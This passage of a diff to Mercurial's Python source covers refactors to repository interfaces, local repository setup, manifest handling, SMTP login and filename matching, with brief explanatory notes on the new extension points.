tree manifests.
"""
+ nodeconstants = interfaceutil.Attribute(
+ """nodeconstants used by the current repository."""
+ )
+
def __getitem__(node):
"""Obtain a manifest instance for a given binary node.
@@ -1423,6 +1446,13 @@
This currently captures the reality of things - not how things should be.
"""
+ nodeconstants = interfaceutil.Attribute(
+ """Constant nodes matching the hash function used by the repository."""
+ )
+ nullid = interfaceutil.Attribute(
+ """null revision for the hash function used by the repository."""
+ )
+
supportedformats = interfaceutil.Attribute(
"""Set of requirements that apply to stream clone.
@@ -1641,6 +1671,14 @@
def revbranchcache():
pass
+ def register_changeset(rev, changelogrevision):
+ """Extension point for caches for new nodes.
+
+ Multiple consumers are expected to need parts of the changelogrevision,
+        so it is provided as an optimization to avoid duplicate lookups. A simple
+ cache would be fragile when other revisions are accessed, too."""
+ pass
+
def branchtip(branchtip, ignoremissing=False):
"""Return the tip node for a given branch."""
@@ -1813,6 +1851,12 @@
def savecommitmessage(text):
pass
+ def register_sidedata_computer(kind, category, keys, computer):
+ pass
+
+ def register_wanted_sidedata(category):
+ pass
+
class completelocalrepository(
ilocalrepositorymain, ilocalrepositoryfilestorage
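
To see how the two register_* extension points declared above fit together: a consumer registers the sidedata category it wants, plus a computer callback with the (repo, revlog, rev, existing_sidedata) signature used by copies_sidedata_computer later in this series. A hypothetical sketch, with the category name and computer body invented for illustration:

    def my_computer(repo, revlog, rev, existing_sidedata):
        # return the sidedata mapping to store for this revision
        return {}

    def reposetup(ui, repo):
        repo.register_wanted_sidedata(b'my-category')
        repo.register_sidedata_computer(
            b'changelog',       # must be changelog, manifest or filelog
            b'my-category',
            (b'my-category',),  # keys this computer can produce
            my_computer,
        )
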
--- a/mercurial/localrepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/localrepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# localrepo.py - read/write repository class for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -21,6 +21,7 @@
hex,
nullid,
nullrev,
+ sha1nodeconstants,
short,
)
from .pycompat import (
@@ -49,6 +50,7 @@
match as matchmod,
mergestate as mergestatemod,
mergeutil,
+ metadata as metadatamod,
namespaces,
narrowspec,
obsolete,
@@ -71,6 +73,7 @@
txnutil,
util,
vfs as vfsmod,
+ wireprototypes,
)
from .interfaces import (
@@ -82,9 +85,13 @@
hashutil,
procutil,
stringutil,
+ urlutil,
)
-from .revlogutils import constants as revlogconst
+from .revlogutils import (
+ concurrency_checker as revlogchecker,
+ constants as revlogconst,
+)
release = lockmod.release
urlerr = util.urlerr
@@ -270,6 +277,11 @@
caps = moderncaps.copy()
self._repo = repo.filtered(b'served')
self.ui = repo.ui
+
+ if repo._wanted_sidedata:
+ formatted = bundle2.format_remote_wanted_sidedata(repo)
+ caps.add(b'exp-wanted-sidedata=' + formatted)
+
self._caps = repo._restrictcapabilities(caps)
# Begin of _basepeer interface.
@@ -313,7 +325,13 @@
)
def getbundle(
- self, source, heads=None, common=None, bundlecaps=None, **kwargs
+ self,
+ source,
+ heads=None,
+ common=None,
+ bundlecaps=None,
+ remote_sidedata=None,
+ **kwargs
):
chunks = exchange.getbundlechunks(
self._repo,
@@ -321,6 +339,7 @@
heads=heads,
common=common,
bundlecaps=bundlecaps,
+ remote_sidedata=remote_sidedata,
**kwargs
)[1]
cb = util.chunkbuffer(chunks)
@@ -452,7 +471,7 @@
# ``.hg/`` for ``relshared``.
sharedpath = hgvfs.read(b'sharedpath').rstrip(b'\n')
if requirementsmod.RELATIVE_SHARED_REQUIREMENT in requirements:
- sharedpath = hgvfs.join(sharedpath)
+ sharedpath = util.normpath(hgvfs.join(sharedpath))
sharedvfs = vfsmod.vfs(sharedpath, realpath=True)
@@ -939,11 +958,10 @@
def makestore(requirements, path, vfstype):
"""Construct a storage object for a repository."""
- if b'store' in requirements:
- if b'fncache' in requirements:
- return storemod.fncachestore(
- path, vfstype, b'dotencode' in requirements
- )
+ if requirementsmod.STORE_REQUIREMENT in requirements:
+ if requirementsmod.FNCACHE_REQUIREMENT in requirements:
+ dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements
+ return storemod.fncachestore(path, vfstype, dotencode)
return storemod.encodedstore(path, vfstype)
@@ -971,7 +989,7 @@
# opener options for it because those options wouldn't do anything
# meaningful on such old repos.
if (
- b'revlogv1' in requirements
+ requirementsmod.REVLOGV1_REQUIREMENT in requirements
or requirementsmod.REVLOGV2_REQUIREMENT in requirements
):
options.update(resolverevlogstorevfsoptions(ui, requirements, features))
@@ -995,12 +1013,12 @@
options = {}
options[b'flagprocessors'] = {}
- if b'revlogv1' in requirements:
+ if requirementsmod.REVLOGV1_REQUIREMENT in requirements:
options[b'revlogv1'] = True
if requirementsmod.REVLOGV2_REQUIREMENT in requirements:
options[b'revlogv2'] = True
- if b'generaldelta' in requirements:
+ if requirementsmod.GENERALDELTA_REQUIREMENT in requirements:
options[b'generaldelta'] = True
# experimental config: format.chunkcachesize
@@ -1196,8 +1214,8 @@
# being successful (repository sizes went up due to worse delta
# chains), and the code was deleted in 4.6.
supportedformats = {
- b'revlogv1',
- b'generaldelta',
+ requirementsmod.REVLOGV1_REQUIREMENT,
+ requirementsmod.GENERALDELTA_REQUIREMENT,
requirementsmod.TREEMANIFEST_REQUIREMENT,
requirementsmod.COPIESSDC_REQUIREMENT,
requirementsmod.REVLOGV2_REQUIREMENT,
@@ -1208,11 +1226,11 @@
requirementsmod.SHARESAFE_REQUIREMENT,
}
_basesupported = supportedformats | {
- b'store',
- b'fncache',
+ requirementsmod.STORE_REQUIREMENT,
+ requirementsmod.FNCACHE_REQUIREMENT,
requirementsmod.SHARED_REQUIREMENT,
requirementsmod.RELATIVE_SHARED_REQUIREMENT,
- b'dotencode',
+ requirementsmod.DOTENCODE_REQUIREMENT,
requirementsmod.SPARSE_REQUIREMENT,
requirementsmod.INTERNAL_PHASE_REQUIREMENT,
}
@@ -1315,6 +1333,8 @@
self.vfs = hgvfs
self.path = hgvfs.base
self.requirements = requirements
+ self.nodeconstants = sha1nodeconstants
+ self.nullid = self.nodeconstants.nullid
self.supported = supportedrequirements
self.sharedpath = sharedpath
self.store = store
@@ -1386,6 +1406,10 @@
if requirementsmod.COPIESSDC_REQUIREMENT in self.requirements:
self.filecopiesmode = b'changeset-sidedata'
+ self._wanted_sidedata = set()
+ self._sidedata_computers = {}
+ metadatamod.set_sidedata_spec_for_repo(self)
+
def _getvfsward(self, origfunc):
"""build a ward for self.vfs"""
rref = weakref.ref(self)
@@ -1473,6 +1497,8 @@
bundle2.getrepocaps(self, role=b'client')
)
caps.add(b'bundle2=' + urlreq.quote(capsblob))
+ if self.ui.configbool(b'experimental', b'narrow'):
+ caps.add(wireprototypes.NARROWCAP)
return caps
# Don't cache auditor/nofsauditor, or you'll end up with reference cycle:
@@ -1639,7 +1665,10 @@
def changelog(self):
# load dirstate before changelog to avoid race see issue6303
self.dirstate.prefetch_parents()
- return self.store.changelog(txnutil.mayhavepending(self.root))
+ return self.store.changelog(
+ txnutil.mayhavepending(self.root),
+ concurrencychecker=revlogchecker.get_checker(self.ui, b'changelog'),
+ )
@storecache(b'00manifest.i')
def manifestlog(self):
@@ -1654,7 +1683,12 @@
sparsematchfn = lambda: sparse.matcher(self)
return dirstate.dirstate(
- self.vfs, self.ui, self.root, self._dirstatevalidate, sparsematchfn
+ self.vfs,
+ self.ui,
+ self.root,
+ self._dirstatevalidate,
+ sparsematchfn,
+ self.nodeconstants,
)
def _dirstatevalidate(self, node):
@@ -2059,6 +2093,9 @@
self._revbranchcache = branchmap.revbranchcache(self.unfiltered())
return self._revbranchcache
+ def register_changeset(self, rev, changelogrevision):
+ self.revbranchcache().setdata(rev, changelogrevision)
+
def branchtip(self, branch, ignoremissing=False):
"""return the tip node for a given branch
@@ -3326,6 +3363,22 @@
fp.close()
return self.pathto(fp.name[len(self.root) + 1 :])
+ def register_wanted_sidedata(self, category):
+ self._wanted_sidedata.add(pycompat.bytestr(category))
+
+ def register_sidedata_computer(self, kind, category, keys, computer):
+ if kind not in (b"changelog", b"manifest", b"filelog"):
+ msg = _(b"unexpected revlog kind '%s'.")
+ raise error.ProgrammingError(msg % kind)
+ category = pycompat.bytestr(category)
+ if category in self._sidedata_computers.get(kind, []):
+ msg = _(
+ b"cannot register a sidedata computer twice for category '%s'."
+ )
+ raise error.ProgrammingError(msg % category)
+ self._sidedata_computers.setdefault(kind, {})
+ self._sidedata_computers[kind][category] = (keys, computer)
+
# used to avoid circular references so destructors work
def aftertrans(files):
@@ -3352,7 +3405,7 @@
def instance(ui, path, create, intents=None, createopts=None):
- localpath = util.urllocalpath(path)
+ localpath = urlutil.urllocalpath(path)
if create:
createrepository(ui, localpath, createopts=createopts)
@@ -3410,18 +3463,20 @@
% createopts[b'backend']
)
- requirements = {b'revlogv1'}
+ requirements = {requirementsmod.REVLOGV1_REQUIREMENT}
if ui.configbool(b'format', b'usestore'):
- requirements.add(b'store')
+ requirements.add(requirementsmod.STORE_REQUIREMENT)
if ui.configbool(b'format', b'usefncache'):
- requirements.add(b'fncache')
+ requirements.add(requirementsmod.FNCACHE_REQUIREMENT)
if ui.configbool(b'format', b'dotencode'):
- requirements.add(b'dotencode')
+ requirements.add(requirementsmod.DOTENCODE_REQUIREMENT)
compengines = ui.configlist(b'format', b'revlog-compression')
for compengine in compengines:
if compengine in util.compengines:
- break
+ engine = util.compengines[compengine]
+ if engine.available() and engine.revlogheader():
+ break
else:
raise error.Abort(
_(
@@ -3442,15 +3497,19 @@
requirements.add(b'exp-compression-%s' % compengine)
if scmutil.gdinitconfig(ui):
- requirements.add(b'generaldelta')
+ requirements.add(requirementsmod.GENERALDELTA_REQUIREMENT)
if ui.configbool(b'format', b'sparse-revlog'):
requirements.add(requirementsmod.SPARSEREVLOG_REQUIREMENT)
# experimental config: format.exp-use-side-data
if ui.configbool(b'format', b'exp-use-side-data'):
+ requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT)
+ requirements.add(requirementsmod.REVLOGV2_REQUIREMENT)
requirements.add(requirementsmod.SIDEDATA_REQUIREMENT)
# experimental config: format.exp-use-copies-side-data-changeset
if ui.configbool(b'format', b'exp-use-copies-side-data-changeset'):
+ requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT)
+ requirements.add(requirementsmod.REVLOGV2_REQUIREMENT)
requirements.add(requirementsmod.SIDEDATA_REQUIREMENT)
requirements.add(requirementsmod.COPIESSDC_REQUIREMENT)
if ui.configbool(b'experimental', b'treemanifest'):
@@ -3458,9 +3517,9 @@
revlogv2 = ui.config(b'experimental', b'revlogv2')
if revlogv2 == b'enable-unstable-format-and-corrupt-my-data':
- requirements.remove(b'revlogv1')
+ requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT)
# generaldelta is implied by revlogv2.
- requirements.discard(b'generaldelta')
+ requirements.discard(requirementsmod.GENERALDELTA_REQUIREMENT)
requirements.add(requirementsmod.REVLOGV2_REQUIREMENT)
# experimental config: format.internal-phase
if ui.configbool(b'format', b'internal-phase'):
@@ -3494,7 +3553,7 @@
dropped = set()
- if b'store' not in requirements:
+ if requirementsmod.STORE_REQUIREMENT not in requirements:
if bookmarks.BOOKMARKS_IN_STORE_REQUIREMENT in requirements:
ui.warn(
_(
@@ -3617,6 +3676,7 @@
if createopts.get(b'sharedrelative'):
try:
sharedpath = os.path.relpath(sharedpath, hgvfs.base)
+ sharedpath = util.pconvert(sharedpath)
except (IOError, ValueError) as e:
# ValueError is raised on Windows if the drive letters differ
# on each path.
@@ -3633,7 +3693,8 @@
hgvfs.mkdir(b'cache')
hgvfs.mkdir(b'wcache')
- if b'store' in requirements and b'sharedrepo' not in createopts:
+ has_store = requirementsmod.STORE_REQUIREMENT in requirements
+ if has_store and b'sharedrepo' not in createopts:
hgvfs.mkdir(b'store')
# We create an invalid changelog outside the store so very old
@@ -3642,11 +3703,11 @@
# effectively locks out old clients and prevents them from
# mucking with a repo in an unknown format.
#
- # The revlog header has version 2, which won't be recognized by
+ # The revlog header has version 65535, which won't be recognized by
# such old clients.
hgvfs.append(
b'00changelog.i',
- b'\0\0\0\2 dummy changelog to prevent using the old repo '
+ b'\0\0\xFF\xFF dummy changelog to prevent using the old repo '
b'layout',
)
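
The dummy-changelog change at the end is worth decoding: the first four bytes of a revlog index carry flags in the high 16 bits and the format version in the low 16 bits, so the old header advertised version 2 (a real, parseable version) while the new one advertises 65535, which no client accepts. A quick check of both headers:

    import struct

    for header in (b'\0\0\0\2', b'\0\0\xFF\xFF'):
        v = struct.unpack(">I", header)[0]
        print('flags=%d version=%d' % (v >> 16, v & 0xFFFF))
    # flags=0 version=2, then flags=0 version=65535
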
--- a/mercurial/lock.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/lock.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# lock.py - simple advisory locking scheme for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/logcmdutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/logcmdutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# logcmdutil.py - utility for log-like commands
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -14,6 +14,7 @@
from .i18n import _
from .node import (
nullid,
+ nullrev,
wdirid,
wdirrev,
)
@@ -27,6 +28,7 @@
graphmod,
match as matchmod,
mdiff,
+ merge,
patch,
pathutil,
pycompat,
@@ -74,6 +76,36 @@
return limit
+def diff_parent(ctx):
+ """get the context object to use as parent when diffing
+
+    If diff.merge is enabled, an overlayworkingctx of the auto-merged
+    parents will be returned.
+ """
+ repo = ctx.repo()
+ if repo.ui.configbool(b"diff", b"merge") and ctx.p2().rev() != nullrev:
+ # avoid cycle context -> subrepo -> cmdutil -> logcmdutil
+ from . import context
+
+ wctx = context.overlayworkingctx(repo)
+ wctx.setbase(ctx.p1())
+ with repo.ui.configoverride(
+ {
+ (
+ b"ui",
+ b"forcemerge",
+ ): b"internal:merge3-lie-about-conflicts",
+ },
+ b"merge-diff",
+ ):
+ repo.ui.pushbuffer()
+ merge.merge(ctx.p2(), wc=wctx)
+ repo.ui.popbuffer()
+ return wctx
+ else:
+ return ctx.p1()
+
+
def diffordiffstat(
ui,
repo,
@@ -217,7 +249,7 @@
ui,
ctx.repo(),
diffopts,
- ctx.p1(),
+ diff_parent(ctx),
ctx,
match=self._makefilematcher(ctx),
stat=stat,
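
diff_parent() only departs from p1 when the diff.merge option is set, in which case log -p on a merge commit diffs against an automatic in-memory merge of both parents, with conflicts rendered as merge3 markers. Judging from the configbool call above, enabling it should be a matter of:

    [diff]
    merge = yes
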
--- a/mercurial/logexchange.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/logexchange.py Tue Apr 20 11:01:06 2021 -0400
@@ -15,6 +15,9 @@
util,
vfs as vfsmod,
)
+from .utils import (
+ urlutil,
+)
# directory name in .hg/ in which remotenames files will be present
remotenamedir = b'logexchange'
@@ -117,7 +120,7 @@
# represent the remotepath with user defined path name if exists
for path, url in repo.ui.configitems(b'paths'):
# remove auth info from user defined url
- noauthurl = util.removeauth(url)
+ noauthurl = urlutil.removeauth(url)
# Standardize on unix style paths, otherwise some {remotenames} end up
# being an absolute path on Windows.
--- a/mercurial/loggingutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/loggingutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -10,7 +10,10 @@
import errno
-from . import pycompat
+from . import (
+ encoding,
+ pycompat,
+)
from .utils import (
dateutil,
@@ -32,7 +35,7 @@
if err.errno != errno.ENOENT:
ui.debug(
b"warning: cannot remove '%s': %s\n"
- % (newpath, err.strerror)
+ % (newpath, encoding.strtolocal(err.strerror))
)
try:
if newpath:
@@ -41,7 +44,7 @@
if err.errno != errno.ENOENT:
ui.debug(
b"warning: cannot rename '%s' to '%s': %s\n"
- % (newpath, oldpath, err.strerror)
+ % (newpath, oldpath, encoding.strtolocal(err.strerror))
)
if maxsize > 0:
--- a/mercurial/mail.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mail.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# mail.py - mail sending bits for mercurial
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -34,6 +34,7 @@
from .utils import (
procutil,
stringutil,
+ urlutil,
)
if pycompat.TYPE_CHECKING:
@@ -139,7 +140,7 @@
defaultport = 465
else:
defaultport = 25
- mailport = util.getport(ui.config(b'smtp', b'port', defaultport))
+ mailport = urlutil.getport(ui.config(b'smtp', b'port', defaultport))
ui.note(_(b'sending mail: smtp host %s, port %d\n') % (mailhost, mailport))
s.connect(host=mailhost, port=mailport)
if starttls:
@@ -150,6 +151,32 @@
if starttls or smtps:
ui.note(_(b'(verifying remote certificate)\n'))
sslutil.validatesocket(s.sock)
+
+ try:
+ _smtp_login(ui, s, mailhost, mailport)
+ except smtplib.SMTPException as inst:
+ raise error.Abort(stringutil.forcebytestr(inst))
+
+ def send(sender, recipients, msg):
+ try:
+ return s.sendmail(sender, recipients, msg)
+ except smtplib.SMTPRecipientsRefused as inst:
+ recipients = [r[1] for r in inst.recipients.values()]
+ raise error.Abort(b'\n' + b'\n'.join(recipients))
+ except smtplib.SMTPException as inst:
+ raise error.Abort(stringutil.forcebytestr(inst))
+
+ return send
+
+
+def _smtp_login(ui, smtp, mailhost, mailport):
+ """A hook for the keyring extension to perform the actual SMTP login.
+
+ An already connected SMTP object of the proper type is provided, based on
+ the current configuration. The host and port to which the connection was
+ established are provided for accessibility, since the SMTP object doesn't
+ provide an accessor. ``smtplib.SMTPException`` is raised on error.
+ """
username = ui.config(b'smtp', b'username')
password = ui.config(b'smtp', b'password')
if username:
@@ -162,21 +189,7 @@
if username and password:
ui.note(_(b'(authenticating to mail server as %s)\n') % username)
username = encoding.strfromlocal(username)
- try:
- s.login(username, password)
- except smtplib.SMTPException as inst:
- raise error.Abort(stringutil.forcebytestr(inst))
-
- def send(sender, recipients, msg):
- try:
- return s.sendmail(sender, recipients, msg)
- except smtplib.SMTPRecipientsRefused as inst:
- recipients = [r[1] for r in inst.recipients.values()]
- raise error.Abort(b'\n' + b'\n'.join(recipients))
- except smtplib.SMTPException as inst:
- raise error.Abort(inst)
-
- return send
+ smtp.login(username, password)
def _sendmail(ui, sender, recipients, msg):
@@ -207,17 +220,16 @@
def _mbox(mbox, sender, recipients, msg):
'''write mails to mbox'''
- fp = open(mbox, b'ab+')
- # Should be time.asctime(), but Windows prints 2-characters day
- # of month instead of one. Make them print the same thing.
- date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime())
- fp.write(
- b'From %s %s\n'
- % (encoding.strtolocal(sender), encoding.strtolocal(date))
- )
- fp.write(msg)
- fp.write(b'\n\n')
- fp.close()
+ with open(mbox, b'ab+') as fp:
+ # Should be time.asctime(), but Windows prints 2-characters day
+ # of month instead of one. Make them print the same thing.
+ date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime())
+ fp.write(
+ b'From %s %s\n'
+ % (encoding.strtolocal(sender), encoding.strtolocal(date))
+ )
+ fp.write(msg)
+ fp.write(b'\n\n')
def connect(ui, mbox=None):
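
The newly factored-out _smtp_login() exists so a password-manager extension can take over authentication without reimplementing connect(). A hypothetical wrapper, where lookup_password is an invented helper and wrapfunction passes the original function as the first argument:

    from mercurial import extensions, mail

    def _keyring_login(orig, ui, smtp, mailhost, mailport):
        password = lookup_password(mailhost, mailport)  # hypothetical
        if not password:
            return orig(ui, smtp, mailhost, mailport)
        # a real extension would decode the username as mail.py does
        smtp.login(ui.config(b'smtp', b'username'), password)

    def extsetup(ui):
        extensions.wrapfunction(mail, '_smtp_login', _keyring_login)
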
--- a/mercurial/manifest.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/manifest.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# manifest.py - manifest revision class for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -792,8 +792,9 @@
@interfaceutil.implementer(repository.imanifestdict)
class treemanifest(object):
- def __init__(self, dir=b'', text=b''):
+ def __init__(self, nodeconstants, dir=b'', text=b''):
self._dir = dir
+ self.nodeconstants = nodeconstants
self._node = nullid
self._loadfunc = _noop
self._copyfunc = _noop
@@ -1051,7 +1052,9 @@
if dir:
self._loadlazy(dir)
if dir not in self._dirs:
- self._dirs[dir] = treemanifest(self._subpath(dir))
+ self._dirs[dir] = treemanifest(
+ self.nodeconstants, self._subpath(dir)
+ )
self._dirs[dir].__setitem__(subpath, n)
else:
# manifest nodes are either 20 bytes or 32 bytes,
@@ -1078,14 +1081,16 @@
if dir:
self._loadlazy(dir)
if dir not in self._dirs:
- self._dirs[dir] = treemanifest(self._subpath(dir))
+ self._dirs[dir] = treemanifest(
+ self.nodeconstants, self._subpath(dir)
+ )
self._dirs[dir].setflag(subpath, flags)
else:
self._flags[f] = flags
self._dirty = True
def copy(self):
- copy = treemanifest(self._dir)
+ copy = treemanifest(self.nodeconstants, self._dir)
copy._node = self._node
copy._dirty = self._dirty
if self._copyfunc is _noop:
@@ -1215,7 +1220,7 @@
visit = match.visitchildrenset(self._dir[:-1])
if visit == b'all':
return self.copy()
- ret = treemanifest(self._dir)
+ ret = treemanifest(self.nodeconstants, self._dir)
if not visit:
return ret
@@ -1272,7 +1277,7 @@
m2 = m2._matches(match)
return m1.diff(m2, clean=clean)
result = {}
- emptytree = treemanifest()
+ emptytree = treemanifest(self.nodeconstants)
def _iterativediff(t1, t2, stack):
"""compares two tree manifests and append new tree-manifests which
@@ -1368,7 +1373,7 @@
self._load() # for consistency; should never have any effect here
m1._load()
m2._load()
- emptytree = treemanifest()
+ emptytree = treemanifest(self.nodeconstants)
def getnode(m, d):
ld = m._lazydirs.get(d)
@@ -1551,6 +1556,7 @@
def __init__(
self,
+ nodeconstants,
opener,
tree=b'',
dirlogcache=None,
@@ -1567,6 +1573,7 @@
option takes precedence, so if it is set to True, we ignore whatever
value is passed in to the constructor.
"""
+ self.nodeconstants = nodeconstants
# During normal operations, we expect to deal with not more than four
# revs at a time (such as during commit --amend). When rebasing large
# stacks of commits, the number can go up, hence the config knob below.
@@ -1610,6 +1617,7 @@
self.index = self._revlog.index
self.version = self._revlog.version
self._generaldelta = self._revlog._generaldelta
+ self._revlog.revlog_kind = b'manifest'
def _setupmanifestcachehooks(self, repo):
"""Persist the manifestfulltextcache on lock release"""
@@ -1653,7 +1661,11 @@
assert self._treeondisk
if d not in self._dirlogcache:
mfrevlog = manifestrevlog(
- self.opener, d, self._dirlogcache, treemanifest=self._treeondisk
+ self.nodeconstants,
+ self.opener,
+ d,
+ self._dirlogcache,
+ treemanifest=self._treeondisk,
)
self._dirlogcache[d] = mfrevlog
return self._dirlogcache[d]
@@ -1704,9 +1716,10 @@
arraytext, deltatext = m.fastdelta(self.fulltextcache[p1], work)
cachedelta = self._revlog.rev(p1), deltatext
text = util.buffer(arraytext)
- n = self._revlog.addrevision(
+ rev = self._revlog.addrevision(
text, transaction, link, p1, p2, cachedelta
)
+ n = self._revlog.node(rev)
except FastdeltaUnavailable:
# The first parent manifest isn't already loaded or the
# manifest implementation doesn't support fastdelta, so
@@ -1724,7 +1737,8 @@
arraytext = None
else:
text = m.text()
- n = self._revlog.addrevision(text, transaction, link, p1, p2)
+ rev = self._revlog.addrevision(text, transaction, link, p1, p2)
+ n = self._revlog.node(rev)
arraytext = bytearray(text)
if arraytext is not None:
@@ -1765,9 +1779,10 @@
n = m2.node()
if not n:
- n = self._revlog.addrevision(
+ rev = self._revlog.addrevision(
text, transaction, link, m1.node(), m2.node()
)
+ n = self._revlog.node(rev)
# Save nodeid so parent manifest can calculate its nodeid
m.setnode(n)
@@ -1822,6 +1837,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
return self._revlog.emitrevisions(
nodes,
@@ -1829,6 +1845,7 @@
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
)
def addgroup(
@@ -1836,6 +1853,7 @@
deltas,
linkmapper,
transaction,
+ alwayscache=False,
addrevisioncb=None,
duplicaterevisioncb=None,
):
@@ -1843,6 +1861,7 @@
deltas,
linkmapper,
transaction,
+ alwayscache=alwayscache,
addrevisioncb=addrevisioncb,
duplicaterevisioncb=duplicaterevisioncb,
)
@@ -1909,6 +1928,7 @@
they receive (i.e. tree or flat or lazily loaded, etc)."""
def __init__(self, opener, repo, rootstore, narrowmatch):
+ self.nodeconstants = repo.nodeconstants
usetreemanifest = False
cachesize = 4
@@ -1947,7 +1967,7 @@
if not self._narrowmatch.always():
if not self._narrowmatch.visitdir(tree[:-1]):
- return excludeddirmanifestctx(tree, node)
+ return excludeddirmanifestctx(self.nodeconstants, tree, node)
if tree:
if self._rootstore._treeondisk:
if verify:
@@ -2110,7 +2130,7 @@
def __init__(self, manifestlog, dir=b''):
self._manifestlog = manifestlog
self._dir = dir
- self._treemanifest = treemanifest()
+ self._treemanifest = treemanifest(manifestlog.nodeconstants)
def _storage(self):
return self._manifestlog.getstorage(b'')
@@ -2160,17 +2180,19 @@
narrowmatch = self._manifestlog._narrowmatch
if not narrowmatch.always():
if not narrowmatch.visitdir(self._dir[:-1]):
- return excludedmanifestrevlog(self._dir)
+ return excludedmanifestrevlog(
+ self._manifestlog.nodeconstants, self._dir
+ )
return self._manifestlog.getstorage(self._dir)
def read(self):
if self._data is None:
store = self._storage()
if self._node == nullid:
- self._data = treemanifest()
+ self._data = treemanifest(self._manifestlog.nodeconstants)
# TODO accessing non-public API
elif store._treeondisk:
- m = treemanifest(dir=self._dir)
+ m = treemanifest(self._manifestlog.nodeconstants, dir=self._dir)
def gettext():
return store.revision(self._node)
@@ -2190,7 +2212,9 @@
text = store.revision(self._node)
arraytext = bytearray(text)
store.fulltextcache[self._node] = arraytext
- self._data = treemanifest(dir=self._dir, text=text)
+ self._data = treemanifest(
+ self._manifestlog.nodeconstants, dir=self._dir, text=text
+ )
return self._data
@@ -2227,7 +2251,7 @@
r0 = store.deltaparent(store.rev(self._node))
m0 = self._manifestlog.get(self._dir, store.node(r0)).read()
m1 = self.read()
- md = treemanifest(dir=self._dir)
+ md = treemanifest(self._manifestlog.nodeconstants, dir=self._dir)
for f, ((n0, fl0), (n1, fl1)) in pycompat.iteritems(m0.diff(m1)):
if n1:
md[f] = n1
@@ -2270,8 +2294,8 @@
whose contents are unknown.
"""
- def __init__(self, dir, node):
- super(excludeddir, self).__init__(dir)
+ def __init__(self, nodeconstants, dir, node):
+ super(excludeddir, self).__init__(nodeconstants, dir)
self._node = node
# Add an empty file, which will be included by iterators and such,
# appearing as the directory itself (i.e. something like "dir/")
@@ -2290,12 +2314,13 @@
class excludeddirmanifestctx(treemanifestctx):
"""context wrapper for excludeddir - see that docstring for rationale"""
- def __init__(self, dir, node):
+ def __init__(self, nodeconstants, dir, node):
+ self.nodeconstants = nodeconstants
self._dir = dir
self._node = node
def read(self):
- return excludeddir(self._dir, self._node)
+ return excludeddir(self.nodeconstants, self._dir, self._node)
def readfast(self, shallow=False):
# special version of readfast since we don't have underlying storage
@@ -2317,7 +2342,8 @@
outside the narrowspec.
"""
- def __init__(self, dir):
+ def __init__(self, nodeconstants, dir):
+ self.nodeconstants = nodeconstants
self._dir = dir
def __len__(self):
--- a/mercurial/match.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/match.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,12 +1,13 @@
# match.py - filename matching
#
-# Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2008, 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import, print_function
+import bisect
import copy
import itertools
import os
@@ -798,14 +799,38 @@
def visitdir(self, dir):
return dir in self._dirs
+ @propertycache
+ def _visitchildrenset_candidates(self):
+ """A memoized set of candidates for visitchildrenset."""
+ return self._fileset | self._dirs - {b''}
+
+ @propertycache
+ def _sorted_visitchildrenset_candidates(self):
+ """A memoized sorted list of candidates for visitchildrenset."""
+ return sorted(self._visitchildrenset_candidates)
+
def visitchildrenset(self, dir):
if not self._fileset or dir not in self._dirs:
return set()
- candidates = self._fileset | self._dirs - {b''}
- if dir != b'':
+ if dir == b'':
+ candidates = self._visitchildrenset_candidates
+ else:
+ candidates = self._sorted_visitchildrenset_candidates
d = dir + b'/'
- candidates = {c[len(d) :] for c in candidates if c.startswith(d)}
+ # Use bisect to find the first element potentially starting with d
+ # (i.e. >= d). This should always find at least one element (we'll
+ # assert later if this is not the case).
+ first = bisect.bisect_left(candidates, d)
+ # We need a representation of the first element that is > d that
+ # does not start with d, so since we added a `/` on the end of dir,
+ # we'll add whatever comes after slash (we could probably assume
+ # that `0` is after `/`, but let's not) to the end of dir instead.
